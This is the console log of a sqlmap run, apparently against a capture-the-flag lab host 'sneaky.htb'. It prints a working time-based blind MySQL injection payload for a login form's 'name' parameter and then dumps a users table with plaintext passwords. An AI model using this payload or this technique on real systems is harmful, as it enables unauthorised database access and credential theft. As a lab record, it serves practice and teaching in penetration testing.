        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:19:04 /2021-02-07/

[17:19:04] [INFO] parsing HTTP request from 'req.txt'
[17:19:04] [INFO] resuming back-end DBMS 'mysql' 
[17:19:04] [INFO] testing connection to the target URL
[17:19:04] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=user' AND (SELECT 7371 FROM (SELECT(SLEEP(5)))lRKG) AND 'yEef'='yEef&pass=pass
---
[17:19:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:19:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[17:19:07] [INFO] fetching current database
[17:19:07] [INFO] resumed: dev
[17:19:07] [INFO] fetching tables for database: 'dev'
[17:19:07] [INFO] fetching number of tables for database 'dev'
[17:19:07] [INFO] resumed: 1
[17:19:07] [INFO] resumed: users
[17:19:07] [INFO] fetching columns for table 'users' in database 'dev'
[17:19:07] [INFO] resumed: 2
[17:19:07] [INFO] resumed: name
[17:19:07] [INFO] resumed: pass
[17:19:07] [INFO] fetching entries for table 'users' in database 'dev'
[17:19:07] [INFO] fetching number of entries for table 'users' in database 'dev'
[17:19:07] [INFO] resumed: 2
[17:19:07] [INFO] resumed: admin
[17:19:07] [INFO] resumed: sup3rstr0ngp4ssf0r4d
[17:19:07] [INFO] resumed: thrasivoulos
[17:19:07] [INFO] resumed: sup3rstr0ngp4ssf0r4d
Database: dev
Table: users
[2 entries]
+--------------+----------------------+
| name         | pass                 |
+--------------+----------------------+
| admin        | sup3rstr0ngp4ssf0r4d |
| thrasivoulos | sup3rstr0ngp4ssf0r4d |
+--------------+----------------------+

[17:19:07] [INFO] table 'dev.users' dumped to CSV file '/root/.local/share/sqlmap/output/sneaky.htb/dump/dev/users.csv'
[17:19:07] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[17:19:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sneaky.htb'

[*] ending @ 17:19:07 /2021-02-07/

